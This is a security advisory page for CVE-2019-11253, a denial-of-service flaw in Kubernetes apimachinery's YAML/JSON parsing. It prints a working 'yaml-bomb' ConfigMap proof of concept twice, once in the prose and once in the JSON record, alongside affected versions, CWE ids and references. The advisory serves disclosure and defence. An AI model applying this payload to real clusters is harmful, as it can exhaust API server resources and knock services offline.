GHSA-74FP-R6JW-H4MP

Vulnerability from github – Published: 2023-02-08 00:35 – Updated: 2024-05-20 21:45
VLAI
Summary
Kubernetes apimachinery packages vulnerable to unbounded recursion in JSON or YAML parsing
Details

CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable.

When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a "Billion Laughs" attack which is quite well known as an XML parsing issue.

Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.

apiVersion: v1
data:
  a: &a ["web","web","web","web","web","web","web","web","web"]
  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
  name: yaml-bomb
  namespace: default

Specific Go Packages Affected

  • k8s.io/apimachinery/pkg/runtime/serializer/json
  • k8s.io/apimachinery/pkg/util/json
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "k8s.io/apimachinery"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20190927203648-9ce6eca90e73"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-02-08T00:35:27Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. \n\nWhen creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a \"Billion Laughs\" attack which is quite well known as an XML parsing issue.\n\nApplying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.\n\n```yaml\napiVersion: v1\ndata:\n  a: \u0026a [\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\"]\n  b: \u0026b [*a,*a,*a,*a,*a,*a,*a,*a,*a]\n  c: \u0026c [*b,*b,*b,*b,*b,*b,*b,*b,*b]\n  d: \u0026d [*c,*c,*c,*c,*c,*c,*c,*c,*c]\n  e: \u0026e [*d,*d,*d,*d,*d,*d,*d,*d,*d]\n  f: \u0026f [*e,*e,*e,*e,*e,*e,*e,*e,*e]\n  g: \u0026g [*f,*f,*f,*f,*f,*f,*f,*f,*f]\n  h: \u0026h [*g,*g,*g,*g,*g,*g,*g,*g,*g]\n  i: \u0026i [*h,*h,*h,*h,*h,*h,*h,*h,*h]\nkind: ConfigMap\nmetadata:\n  name: yaml-bomb\n  namespace: default\n```\n### Specific Go Packages Affected\n- k8s.io/apimachinery/pkg/runtime/serializer/json\n- k8s.io/apimachinery/pkg/util/json\n",
  "id": "GHSA-74fp-r6jw-h4mp",
  "modified": "2024-05-20T21:45:20Z",
  "published": "2023-02-08T00:35:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11253"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubernetes/kubernetes/issues/83253"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubernetes/kubernetes/pull/83261"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-pmqp-h87c-mr78"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kubernetes/kubernetes"
    },
    {
      "type": "WEB",
      "url": "https://groups.google.com/g/kubernetes-security-announce/c/jk8polzSUxs"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2022-0965"
    },
    {
      "type": "WEB",
      "url": "https://stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Kubernetes apimachinery packages vulnerable to unbounded recursion in JSON or YAML parsing"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…